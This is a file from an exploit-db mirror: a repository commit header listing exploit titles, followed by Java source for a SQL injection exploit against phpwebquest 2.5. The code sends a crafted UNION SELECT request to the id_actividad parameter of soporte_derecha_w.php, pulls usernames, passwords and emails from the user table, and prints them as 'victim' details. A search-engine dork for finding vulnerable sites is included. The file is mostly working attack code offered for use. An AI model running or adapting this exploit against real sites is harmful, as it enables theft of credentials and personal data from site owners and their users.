exploit-db-mirror/platforms/php/webapps/4407.java
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

96 lines
3.8 KiB
Java
Executable file

/*
* script name : phpwebquest
* script version : 2.5
* script website : http://phpwebquest.org
* Bug Finder : D4real_TeaM ('unkn0wnX','n3t-mapper','ToxiC350');
* injected file : webquest/soporte_derecha_w.php
* Variable : id_actividad
* Contact : n3t-mapp3r [At] hotmail [dot] com,is14m [At] hotmail [dot] com,ushermehdi350 [At] hotmail [dot] com
*
* Usage:
* First you must have a JDK 1.4 or more to compile the code
* Compiling: javac -nowarn -g:none SqInjection.java
* Usage: java SqInjection host_name /path/to/script/
* Dork : inurl:/webquest/soporte_derecha_w.php?
*
* GreetZ : s4udi-s3curity-terror, Spy-Boy, R3mix-boY, Dchach-X, DiaboliC4, j4v4k, Hitch4w4, Und34d and all Moroccan,arab hackerS
* Sp.Greetz : s0crateX ;)
*/
import java.io.*;
import java.net.* ;
public class SqInjection {
public static void main(String[] argv) {
Socket lhlawa;
String hName,tra9,bachT3tih=" union select 1,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail) from usuario";
int lmarsa=80;
BufferedReader _______dakhl;PrintWriter _______kharj;
if(argv.length!=2){
System.out.println("Error: args not properly defined");
System.exit (-1);
}
String zgawa[]=argv[0].split(":");
if(zgawa.length==2){
hName=zgawa[0];
try{
lmarsa=Integer.parseInt(zgawa[1]);
}catch(NumberFormatException ex){
System.out.println("Error: Invalid Port");System.exit(0);
}
}else{
hName=argv[0];
}
tra9=argv[1];
System.out.print("Connecing to: "+hName);
try{
lhlawa=new Socket(hName,lmarsa);
System.out.println("\t\t[ OK ]");
String in3alBoh="",taya7Jdo="GET /"+tra9+"/webquest/soporte_derecha_w.php?id_actividad=-1"+URLEncoder.encode(bachT3tih)+"/* HTTP/1.1\n";
taya7Jdo+="Host: "+hName+"\n";
taya7Jdo+="Connection: Close\n\n";
_______kharj=new PrintWriter(lhlawa.getOutputStream());
_______dakhl=new BufferedReader(new InputStreamReader( lhlawa.getInputStream()));
_______kharj.print(taya7Jdo);
_______kharj.flush();
String line=_______dakhl.readLine();
if(line.equalsIgnoreCase("HTTP/1.1 200 OK")==false){
System.out.println("Error:Invalid HTTP protocol");System.exit(0);
}
boolean ok=false;
while((line=_______dakhl.readLine())!=null){
if(ok==false){
if(line.length()==0)
{ok=true;
}
}
else in3alBoh+=line+"\n";
}
_______kharj.close();
_______dakhl.close();
parseData(in3alBoh);
}catch(IOException ex){
System.out.println("\nSocket Error program will exit");
System.exit(0);
}
}
private static void parseData(String haHwaJay){
String uName,passwd,mail,tmp[];
tmp=haHwaJay.split("\n");
for(int i=0;i<tmp.length;i++)
{
if(tmp[i].trim().startsWith("<td width=\"97%\">"))
{
String safiTa7=tmp[i].trim().substring(16,tmp[i].trim().length()-4);
tmp=safiTa7.split (":");
break;
}
}
uName=tmp[0];passwd=tmp[1];mail=tmp[2];
System.out.println("*************************** Informations about the victim ***************************");
System.out.println("User Name: "+uName+"\nPassword: "+passwd+"\nVictimz mail: "+mail);
}
}
# milw0rm.com [2007-09-14]